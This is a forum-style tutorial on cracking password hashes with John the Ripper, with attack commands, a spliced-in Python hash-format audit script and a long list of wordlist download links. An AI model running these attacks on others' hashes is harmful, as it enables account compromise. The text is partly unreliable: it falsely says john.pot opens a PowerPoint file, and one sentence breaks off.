These few tips will make less work (not a whole lot less, but a little) when writing out the commands that follow.

When you install John the Ripper, you will not open anything in the installed folders, nor will you find it newly installed under Start and Programs for easy access. No, with John the Ripper you have to open it via the MS-DOS command line. I assume you already know how to open the command line, but in case you don't and don't want to have to admit that to someone for fear of getting made fun of: go to Start, Run, and type in cmd or command.

Once you have that open you have to go to the John the Ripper directory. If you did what I said above in the tips, then it should be in the folder "C:/john/run/". If you didn't, yet you still installed it with at least the first tip, it should look something like this: "C:/john/john1701/run/". To go to the location in the command line you have to type this command: cd C:/john/run

With this command typed in the next line should look like this: C:\john\run>

Now type in "john" or "john-386" (without the quotation marks of course) depending on the name of it. You should have the program information menu come up and it should give you the list of things it can do. Now is when we will get into the types of attacks I will show you in this article.

-Bruteforce Attack-


First I will show you John the Ripper's bruteforcing mode. All this mode does is try every possible combination of letters (both upper and lowercase), numbers, symbols or any combination of the three until it finds the password. Before I tell you how to do it, we have to take our hash (I'm going to use shape:CRjRYEn9g3PUc from above), copy and paste it into Notepad, and save it in the "run" directory in John the Ripper as a .txt file. I'm going to call it hash.txt. One way to do this type of attack is to type in "john hash.txt" (all commands will be without the quotation marks) and press Enter. This will start trying to bruteforce the password. Another way would be to drag the hash.txt file and drop it on the john application (this will be done in the run folder). There is a big problem with this type of attack, though: it can take extremely long, and no one wants to wait long periods of time if they don't have to. You can stop the process at any time by pressing "Ctrl+C". Also, John the Ripper doesn't show the progress, but you can check the progress by pressing any key (assuming the key won't do something to interrupt the program; just use Enter or an arrow key or something).

-Bruteforce Attack with conditions-


One way you can shorten things up is by choosing to use only letters or only numbers to crack the password. If you think the password only contains letters, you can use the command "john -i:alpha hash.txt"; if you think the password only contains numbers, you can use the command "john -i:digits hash.txt". You can also use the command "john -i:all hash.txt" to guess the password, which uses both the letters and numbers.

-Dictionary Attack-


Now, when passwords get long, even this method can be a long task. So another type of attack you can do is called a dictionary attack. A dictionary attack takes a wordlist (a text document full of words, be it an actual dictionary or more) and checks each word in that list until it finds a match. This is a much faster way than the bruteforcing methods above. However, this type of attack will only work if the password behind the hash is among the words in the wordlist. For this example the wordlist I will use will be called "wordlist.txt". To do a dictionary attack, type in this command: john -w:wordlist.txt hash.txt

When John the Ripper is done cracking the password and comes back with an answer, it will display the password on screen (at least it does for me). However, if it doesn't (or if you want to go back and look at it in the future) there are two ways you can view the password. One is using the command "john -show hash.txt", which will display the cracked hash on screen, and the other is "john.pot" (or you can manually open it from the run folder), which will open up a PowerPoint document and have the passwords displayed on it.

-Simple Attack-


I'm not entirely sure what simple attack does so someone can correct me if I'm wrong. Through using it, it seems to me that simple attack will take your username in the hash (in mine it's "shape" remember) and only run a bruteforce using that word and add a little to it. For example it will try shape with numbers and symbols after it like shape1. It will also try the options by adding an uppercase to the first letter so it will check things like this Shape43. It appears that it will try all numbers up to 200 after the word as I tried shape320 and it would not crack it and it shows shape200 when it stops trying. It will not try for example sHapE3 though, only check the first letter with uppercase not all the letters. This should give you a basic idea of what it can do. It might be able to do more but I haven't played around with it to figure more out. Feel free to do this on your own though.

-Additional Notes-


If you get an error saying "No hash loaded" there could be a couple reasons for this. One is that the hash you entered and saved is not recognized as being a hash and you should check to make sure you copied things right. Two is that the hash has previously been cracked and you can check the john.pot file to see if it has.

Also, when you're doing your attacks, if you want to get the answer saved to a file, you can type "> something.txt" after the command and it will save it to that text file in the "run" folder. So a full dictionary attack example would look like this: john -w:wordlist.txt hash.txt > cracked.txt

One more thing. If you didn't notice me saying it above, the quotes("...") above any of the commands above


-The "format" option attack-


Everything I have demonstrated up until now has been an attack on a DES hash. So you might be asking yourself, "Is this all John the Ripper can crack?" The answer to that question is no. It is capable of cracking such hashes as BSDI, MD5, BF, AFS and LM. The command you are going to use for this attack looks like this: john -format:hashtype hash.txt

So DES looks like this: john -format:des hash.txt
And MD5 looks like this: john -format:md5 hash.txt
etc
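For someone auditing their own password files, the 13-character DES shape described earlier and the format names listed above are enough to spot legacy hashes, and the same shape check explains most "No hash loaded" errors caused by a truncated copy. The following is an added example, not code from the original tutorial or from the John the Ripper project; the names classify, audit, FORMATS and SAMPLE are assumptions, and every sample line except the tutorial's own shape:CRjRYEn9g3PUc is a constructed placeholder.

```python
import re

B64 = r"[./0-9A-Za-z]"  # alphabet shared by the crypt(3) encodings below

# (label, pattern, audit verdict). Labels reuse the tutorial's format names.
FORMATS = [
    ("DES", re.compile(rf"^{B64}{{13}}$"),
     "weak: 2-char salt, only the first 8 password characters count"),
    ("BSDI", re.compile(rf"^_{B64}{{19}}$"), "weak: still DES-based"),
    ("MD5", re.compile(rf"^\$1\${B64}{{1,8}}\${B64}{{22}}$"),
     "weak: fast to compute"),
    ("BF", re.compile(rf"^\$2[abxy]\$\d\d\${B64}{{53}}$"),
     "ok: adjustable work factor"),
]

def classify(line):
    """Return (user, label, verdict) for one 'user:hash' line."""
    user, sep, rest = line.strip().partition(":")
    if not sep or not user:
        return (None, "INVALID", "not in user:hash form")
    hash_field = rest.split(":")[0]  # passwd-style lines carry extra fields
    for label, pattern, verdict in FORMATS:
        if pattern.match(hash_field):
            return (user, label, verdict)
    return (user, "UNRECOGNIZED", "check for truncation or stray characters")

def audit(lines):
    """Group users by detected format so legacy hashes stand out."""
    report = {}
    for line in lines:
        if line.strip():
            user, label, _ = classify(line)
            report.setdefault(label, []).append(user or line.strip())
    return report

# First line is the tutorial's example; the rest are constructed placeholders
# with the right shape, not real hashes.
SAMPLE = [
    "shape:CRjRYEn9g3PUc",
    "alice:$1$abcdefgh$0123456789abcdefghijkl",
    "bob:CRjRYEn9g3PU",  # 12 characters: truncated while copying
    "carol:$2a$10$" + "A" * 53,
]

if __name__ == "__main__":
    for label, users in audit(SAMPLE).items():
        print(f"{label:13} {', '.join(users)}")
```

Accounts reported under DES, BSDI or MD5 are the ones to move to a stronger scheme first.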

---Conclusion---


Well this is the end of this article but don't think that this is all that John the Ripper can do because there is a lot more. These are just some of the basics and I'll leave you to figure out the rest on your own so play around with it and experiment. I hope this was a fairly good article and is able to help some people out. If anyone has any problems or questions, feel free to pm me and I will help you out if I can. I may return and add in more information if I feel like it. Also if I have any incorrect information you can pm me and I will correct it.

---Extra Resources---


I've decided to throw in something extra that may be helpful to some people.

For people who are looking for word lists, here is a great collection of links:
http://hackingspecialist.blogspot.com/2012/08/wordlist-thread-keep-adding.html

Here is the official documentation for John the Ripper and should be a good resource for going further into using the program:
http://www.openwall.com/john/doc/

Wordlist Thread Keep Adding

Word lists :

http://advlamer.narod.ru

http://www.insidepro.com/rus/download.shtml

http://www.passwords.ru/dic.htm

http://www.outpost9.com/files/WordLists.html

http://www.phreak.com/html/wordlists.shtml

http://www.hackemate.com.ar/wordlists/

http://gdataonline.com/downloads/

http://void.cyberpunk.ru/wordlist/

http://icqinfo.ru/soft_brute.shtml

http://www.acolytez.com/dict/

ftp://ftp.cerias.purdue.edu/pub/dict/

Mirror:
ftp://ftp.funet.fi/pub/unix/security/dictionaries/
ftp://coast.cs.purdue.edu/pub/dict/wordlists/
ftp://ftp.openwall.com/pub/wordlists/
ftp://ftp.ox.ac.uk/pub/wordlists/
ftp://ftp.sil.org/pub/data/span-lex.zip
Other:
http://someshit.net/files/g0df4th4r_g0ld_dic_2032348w0rds.zip
http://someshit.net/files/wordlist.zip
http://zloy.org/downloads/zloy_pass_nick.zip
http://www.iseekyou.ru/forum/index.php?showtopic=62&mode=threaded
http://neworder.box.sk/link.php?currentgrp=38610
http://advlamer.narod.ru/dprogs/sort_file.rar
http://advlamer.narod.ru/dprogs/glueandsort.rar
http://advlamer.narod.ru/dprogs/glue_files.rar
http://advlamer.narod.ru/mprogs/text_parser.rar
http://advlamer.narod.ru/dprogs/dict_cut.rar
http://advlamer.narod.ru/dprogs/multi_dict.rar
http://www.theargon.com/achilles/wordlists/
http://www.uinc.ru/forum/faqs/wordlist.shtml

http://www.sil.org/linguistics/wordlists/english/wordlist/wordsEn.txt
http://sites.rapidus.net/jhuriaux/vpq19000.txt
http://underground54.serveurperso.com/telecharger/dico/

http://www.megaupload.com/?d=66IX1R04
http://www.megaupload.com/it/?d=F929X272
http://www.megaupload.com/?d=0HYO9XP2
http://www.megaupload.com/?d=4PVFCC7C

http://www.dcs.shef.ac.uk/research/ilash/Moby/
http://www.cs.princeton.edu/introcs/datafiles/wordlist.txt
http://www.cs.princeton.edu/introcs/datafiles/words.txt
http://spacebar.org/ifcd/wordlist.txt
http://cd.textfiles.com/suzybatari2/wordwork/dicwords/wordlist.txt
http://labs.mininova.org/wordmatch/wordlist.txt
http://bellsouthpwp.net/u/t/uttie/wordlist.txt
http://people.cs.uchicago.edu/~robby/courses/22001-2004-spring/yawl-word.list
http://pragdave.pragprog.com/data/wordlist.txt
http://www.doz.org.uk/Science/wordlist.txt
http://vburton.ncsa.uiuc.edu/wordlist.txt
http://www.ics.uci.edu/~kay/wordlist.txt
http://www.inf.unideb.hu/~jeszy/download/mestint/wordlist.txt
http://www.opends.org/source/raw/trunk/opends/resource/config/wordlist.txt
http://www.lionelbiggins.com/examples/Wordlist.txt
http://www.sslmit.unibo.it/~dsmiraglio/wordlist/
http://www.informatik.uni-leipzig.de/~duc/software/misc/vn_words.zip
http://www.cis.hut.fi/morphochallenge2007/data/
http://wordlist.sf.cz/
http://john.cs.olemiss.edu/~sbs/download/cs517_NLP/wordlist/
http://www.opensource.apple.com/darwinsource/Current/BerkeleyDB-12/db/test/wordlist
http://potm.tripod.com/BOGGLE/wordlist.txt
http://people.debian.org/~ericvb/speeches/regexp/wordlist.txt
http://coyotecult.com/tools/files/wordlist.txt
http://aima.eecs.berkeley.edu/data/wordlist
http://andre.facadecomputer.com/ghost/WORDLIST.TXT
http://aurora.rg.iupui.edu/~schadow/dbm-java/db-2.4.14/test/wordlist
http://www.ics.uci.edu/~jfurlong/ics23/wordlist.txt
http://www.searchcrazy.cn/WordList/WordList_GRE.txt
http://www.cs.bilkent.edu.tr/~ccelik/cs111/WordList.txt
http://www.lostboxen.net/warglue/contests/defcon11-wardrive/resources/stefan-wordlist.txt
http://broncgeeks.billings.k12.mt.us/vlong/php-projects/hangperson/wordlist.txt
http://marc13.narod.ru/bit/wordlist.txt
http://concept.temple.edu/sysadmin/227million--mega_dic.zip -- ~ 2Gb

http://rapidshare.com/files/48467405/dates.rar (dictionary of dates 1.01.1900 - 31.12.1999, 16kb)
http://rapidshare.com/files/48743054/combined.rar
http://mazahaka-89.narod.ru/Web_mazahaka89/articles/12345_ili_paroli_kotorie_my_vybiraem.htm
http://www.rapidshare.ru/381482
http://www.dbslovar.h.com.ua/russ_pass.txt
http://www.dbslovar.h.com.ua/eng_pass.txt

ftp://ftp.zedz.net/pub/crypto/wordlists/
http://packetstormsecurity.org/Crackers/wordlists/
http://theargon.com/achilles/wordlists/
https://www.totse.com/en/hack/word_lists/index.html
https://www.securinfos.info/wordlists_dictionnaires.php
http://www.leetupload.com/dbindex2/index.php?dir=Word%20Lists/

http://www.linuxkungfu.org/files/wordlists/
http://www.ihteam.net/tools/wordlist.rar
http://whacking.narod.ru/mat_rug_brut.txt